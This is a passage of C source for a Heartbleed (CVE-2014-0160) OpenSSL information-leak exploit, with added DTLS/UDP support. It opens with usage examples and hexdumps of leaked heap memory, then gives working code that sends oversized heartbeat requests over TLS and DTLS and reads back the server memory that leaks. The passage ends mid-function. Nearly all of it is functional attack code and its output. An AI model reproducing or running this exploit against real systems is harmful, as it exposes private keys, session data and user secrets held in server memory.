server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n\r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n* \r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n* \r\n* \r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0.."0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |."..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e...."|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q."gf."...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n* \r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\nconnection* dtls_server(int sd, char* server,int port){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n\tunsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("bind()");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n//\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n//\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* dtls_client(int sd, char* server,int port){\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n\tmemset((char *)&sa,0,sizeof(sa));\r\n\tc = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("connect()");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n\tSSL_set_tlsext_host_name(c->sslHandle,server);\r\n\tbio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n\tBIO_ctrl_set_connected(bio, 1, &sa);\r\n\tSSL_set_bio(c->sslHandle, bio, bio);\r\n\tSSL_set_connect_state (c->sslHandle);\r\n//printf("eshta\\n");\r\n if(SSL_connect(c->sslHandle)!=1) \r\n ERR_print_errors_fp(stderr);\r\n\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway), %d \\n",c->sslHandle->tlsext_heartbeat);\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2 + 16);\r\n\tmemset(buf, '\\0', sizeof buf);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n//\t\t\ts2n(0xffff,p);\r\n//\t\t\ts2n(0x3feb,p);\r\n\t\t\ts2n(0x0538,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\ts2n(c->sslHandle->tlsext_hb_seq, p);\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n\r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n\r\n\tif (ret >= 0)\r\n\t\t{\r\n\t\tif (c->sslHandle->msg_callback)\r\n\t\t\tc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n\t\t\t\tbuf, 3 + 16,\r\n\t\t\t\tc->sslHandle, c->sslHandle->msg_callback_arg);\r\n\r\n\t\tdtls1_start_timer(c->sslHandle);\r\n\t\tc->sslHandle->tlsext_hb_pending = 1;\r\n\t\t}\r\n\r\n OPENSSL_free(buf);\r\n\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= 